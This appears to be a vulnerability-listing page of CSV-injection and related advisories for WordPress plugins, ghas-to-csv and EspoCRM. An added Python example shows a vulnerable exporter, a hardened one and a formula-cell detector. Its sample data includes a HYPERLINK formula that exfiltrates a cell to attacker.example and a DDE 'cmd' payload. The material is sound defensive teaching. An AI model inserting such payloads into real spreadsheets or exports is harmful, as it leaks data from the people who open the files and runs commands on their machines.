PT-2022-24180 · WordPress · Export Post Info
Name of the Vulnerable Software and Affected Versions: Export Post Info plugin versions 1.2.0 and earlier Description: The issue is related to an Authenticated CSV Injection vulnerability. This vulnerability affects the Export Post Info plugin at WordPress, where an authenticated user with author...
WordPress plugin Export Post Info security vulnerability
WordPress and WordPress plugins are both products of the WordPress Foundation. WordPress is a blogging platform developed in PHP that runs on PHP and MySQL servers and supports personal blogs. A WordPress plugin is an application...
WordPress Export Post Info plugin <= 1.2.0 - Authenticated CSV Injection vulnerability
Authenticated CSV Injection vulnerability discovered by Mika (Patchstack Alliance) in WordPress Export Post Info plugin versions <= 1.2.0. Solution: update the WordPress Export Post Info plugin to the latest available version (at least 1.2.1)...
CVE-2022-36386 WordPress Import any XML or CSV File to WordPress plugin <= 3.6.7 - Authenticated Arbitrary Code Execution vulnerability
Remote code execution
Authenticated Arbitrary Code Execution vulnerability in Soflyy Import any XML or CSV File to WordPress plugin <= 3.6.7 at WordPress...
Import all XML, CSV & TXT into WordPress < 6.5.8 - Admin+ SQLi
The plugin does not properly sanitise and escape imported data before using them back in SQL statements, leading to SQL injection exploitable by high-privilege users such as admin. PoC: with the additional https://wordpress.org/plugins/polylang/ plugin installed, import a CSV with the following payload in...
CVE-2022-39217 Improper Neutralization of Formula Elements in a CSV File in ghas-to-csv
Code injection
some-natalie/ghas-to-csv (GitHub Advanced Security to CSV) is a GitHub Action which scrapes the GitHub Advanced Security API and writes the results into a CSV. In affected versions this GitHub Action creates a CSV file without sanitizing the output of the APIs, enabling potential execution of arbitrary code if a dismissed alert or any other custom field contains executable code / formulas...
GHSA-634P-93H9-92VH ghas-to-csv vulnerable to Improper Neutralization of Formula Elements in a CSV File
Impact: This GitHub Action creates a CSV file without sanitizing the output of the APIs. If an alert is dismissed or any other custom field contains executable code / formulas, it might be run when an endpoint opens that CSV file in a spreadsheet program. The data flow looks like this...
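Added example (not code from any advisory or project listed on this page): the pattern behind the CSV-injection entries, in Python. The naive exporter writes attacker-controlled API fields verbatim, which is what the ghas-to-csv and EspoCRM entries describe; the hardened exporter neutralizes cells a spreadsheet would evaluate (CWE-1236), and a scanner flags such cells in an existing CSV so an exported file can be checked before it is opened. The alert records are constructed sample data and the column names are assumptions, not the real ghas-to-csv schema.

```python
import csv
import io
import re

# Leading characters that make common spreadsheets evaluate a cell as a
# formula. Tab and carriage return are included because some importers strip
# them before interpreting the cell, so "\t=CMD()" still executes.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# Plain negative numbers start with "-" but are not formulas; exempt them so
# numeric columns survive the export unchanged.
NUMERIC = re.compile(r"-?\d+(\.\d+)?")

# Constructed sample: alerts as an API might return them. The free-text
# "dismissed_comment" field is under the control of whoever dismissed the alert.
SAMPLE_ALERTS = [
    {"number": 1, "rule": "js/sql-injection", "dismissed_comment": "false positive"},
    {"number": 2, "rule": "py/command-line-injection",
     "dismissed_comment": '=HYPERLINK("http://attacker.example/?x="&A1,"click")'},
    {"number": 3, "rule": "go/path-injection",
     "dismissed_comment": "-2+3+cmd|' /C calc'!A0"},
]
FIELDS = ["number", "rule", "dismissed_comment"]  # assumed column names


def is_formula_like(cell):
    """True if a spreadsheet would treat this cell as a formula on open."""
    return cell.startswith(FORMULA_TRIGGERS) and not NUMERIC.fullmatch(cell)


def neutralize_cell(value):
    """Prefix a single quote so the leading trigger character is shown as text.

    csv.writer escapes embedded double quotes for us; with QUOTE_ALL the cell
    is also wrapped in quotes, which is the OWASP-recommended combination.
    """
    text = "" if value is None else str(value)
    return "'" + text if is_formula_like(text) else text


def export_naive(rows):
    """Vulnerable: API fields are written verbatim into the CSV."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=FIELDS)
    writer.writeheader()
    for row in rows:
        writer.writerow(row)
    return buf.getvalue()


def export_hardened(rows):
    """Fixed: every cell is neutralized and quoted before it reaches the file."""
    buf = io.StringIO()
    writer = csv.DictWriter(buf, fieldnames=FIELDS, quoting=csv.QUOTE_ALL)
    writer.writeheader()
    for row in rows:
        writer.writerow({k: neutralize_cell(v) for k, v in row.items()})
    return buf.getvalue()


def find_formula_cells(csv_text):
    """Detection: return (row, column, cell) for every formula-like cell."""
    hits = []
    for row_no, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for col_no, cell in enumerate(row):
            if is_formula_like(cell):
                hits.append((row_no, col_no, cell))
    return hits


if __name__ == "__main__":
    print("naive export flags:", find_formula_cells(export_naive(SAMPLE_ALERTS)))
    print("hardened export flags:", find_formula_cells(export_hardened(SAMPLE_ALERTS)))
    print(export_hardened(SAMPLE_ALERTS))
```

The apostrophe prefix is visible to whoever opens the file, which is the accepted trade-off; stripping the trigger characters instead would silently alter data, and relying on quoting alone does not stop evaluation. The `-2+3+cmd|' /C calc'!A0` sample is the classic DDE shape: it starts with a minus and so passes a numeric-looking glance, which is why the check exempts only cells that are entirely numeric.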
CVE-2022-38844
CSV Injection in Create Contacts in EspoCRM 7.1.8 allows remote authenticated users to run system commands by creating contacts with payloads capable of executing system commands. An admin user exporting contacts to a CSV file may end up executing the malicious system commands on their own system...
CVE-2022-38845
Cross Site Scripting in the Import feature in EspoCRM 7.1.8 allows remote users to run malicious JavaScript in the victim's browser by sending a crafted CSV file containing malicious JavaScript to an authenticated user. Any authenticated user importing the crafted CSV file may end up running the malicious...